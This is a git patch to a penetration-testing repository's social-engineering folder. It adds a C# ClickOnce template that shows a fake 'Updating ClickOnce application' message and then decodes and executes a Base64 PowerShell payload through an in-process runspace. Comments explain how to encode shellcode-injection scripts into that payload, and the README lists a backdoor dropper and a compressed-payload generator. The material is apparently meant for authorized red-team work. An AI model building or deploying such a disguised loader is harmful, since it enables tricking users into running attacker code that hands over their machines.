From c52a66f3c9cc0f14a1b46212eb55179d4ab0555d Mon Sep 17 00:00:00 2001 From: Mariusz B Date: Sat, 10 Feb 2018 16:45:32 +0100 Subject: [PATCH] Added ClickOnce SharpPick template. --- social-engineering/README.md | 2 + .../clickOnceSharpPickTemplate.cs | 69 +++++++++++++++++++ 2 files changed, 71 insertions(+) create mode 100644 social-engineering/clickOnceSharpPickTemplate.cs diff --git a/social-engineering/README.md b/social-engineering/README.md index 210148d..80888e8 100644 --- a/social-engineering/README.md +++ b/social-engineering/README.md @@ -4,6 +4,8 @@ - **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac)) +- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015)) + - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc)) diff --git a/social-engineering/clickOnceSharpPickTemplate.cs b/social-engineering/clickOnceSharpPickTemplate.cs new file mode 100644 index 0000000..6026ee9 --- /dev/null +++ b/social-engineering/clickOnceSharpPickTemplate.cs @@ -0,0 +1,69 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using System.IO; +using System.Resources; +using System.Net; + +using System.Collections.ObjectModel; + +// +// Use NuGet to install System.Management.Automation reference. +// +using System.Management.Automation; +using System.Management.Automation.Runspaces; + +namespace ConsoleApplication2 +{ + class Program + { + // + // This function and concept comes from PowerPick / SharpPick project by Sixdub: + // https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick + // + static string RunPS(string cmd) + { + // Init stuff + Runspace runspace = RunspaceFactory.CreateRunspace(); + runspace.Open(); + RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); + Pipeline pipeline = runspace.CreatePipeline(); + + // Add commands + pipeline.Commands.AddScript(cmd); + + // Prep PS for string output and invoke + pipeline.Commands.Add("Out-String"); + Collection results = pipeline.Invoke(); + runspace.Close(); + + // Convert records to strings + StringBuilder stringBuilder = new StringBuilder(); + foreach (PSObject obj in results) + { + stringBuilder.Append(obj); + } + return stringBuilder.ToString().Trim(); + } + + static void Main() + { + Console.WriteLine("Updating ClickOnce application. Please wait..."); + + // + // Here comes your Base64 encoded Powershell payload. + // A good example of what to stick in here is a modified Invoke-Shellcode.ps1 + // that will spawn a process and insert there some shellcode. + // You can prepare Base64 UTF8 shellcode via: + // PS> $text = Get-Content yourShellcode.ps1 + // PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text); + // PS> $encoded = [Convert]::ToBase64String($bytes); + // PS> $encoded | Out-File "myEncodedShellcode.ps1" + // + String base64encodedPayload = ""; + + RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))"); + } + } +}